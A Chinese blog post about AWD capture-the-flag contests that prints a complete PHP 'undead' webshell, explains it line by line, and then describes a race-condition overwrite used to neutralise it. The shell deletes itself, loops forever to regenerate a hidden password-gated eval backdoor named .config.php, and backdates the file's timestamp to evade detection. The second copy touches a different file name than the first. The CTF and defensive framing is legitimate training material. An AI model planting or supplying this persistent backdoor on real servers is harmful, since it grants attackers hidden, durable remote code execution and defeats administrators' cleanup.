AWD不死马与克制方法
学习于:https://www.cnblogs.com/Cl0ud/p/13620537.html
一个简单的不死马
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '.config.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
//pass=pass
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .config.php');
usleep(5000);
}
?>在AWD比赛中,不死马对于维持权限十分有效。将该php文件上传到服务器,然后进行访问,会在该路径下循环生成名字为.config.php的不死马隐藏文件
蚁剑连接
简单介绍一下PHP不死马代码
<?php
ignore_user_abort(true); //设置与客户机断开是否会终止脚本的执行,这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行
set_time_limit(0); //设置脚本最大执行时间,这里设置为0,即没有时间方面的限制
unlink(__FILE__); //删除文件本身,以起到隐蔽自身的作用
$file = '.config.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>'; //进行校验是为了防止自家木马被其他人利用
//pass=pass
while (1){
file_put_contents($file,$code);
system('touch -m -d "2018-12-01 09:10:12" .3.php');
usleep(5000); //while循环中每隔usleep(5000)即写新的后门文件,system命令用于修改文件的创建时间或修改时间,因为在AWD比赛中会有队伍使用find命令查看文件的修改时间
}
?>使用条件竞争写入同名文件进行克制不死马
对于不死马,直接删除脚本是没有用的,因为php执行的时候已经把脚本读进去解释成opcode运行了
关于opcode有:https://www.laruence.com/2008/06/18/221.html
这里使用条件竞争写入同名文件进行克制不死马
可以看到现在.config.php文件内容仍为:
我们上传一个test.php的php文件,注意usleep需要比不死马小,$code修改为无害内容
上传至服务器访问
再次查看.config.php文件内容,可以看到内容已无害
本文来自博客园,作者:NoCirc1e,转载请注明原文链接:https://www.cnblogs.com/NoCirc1e/p/16287124.html
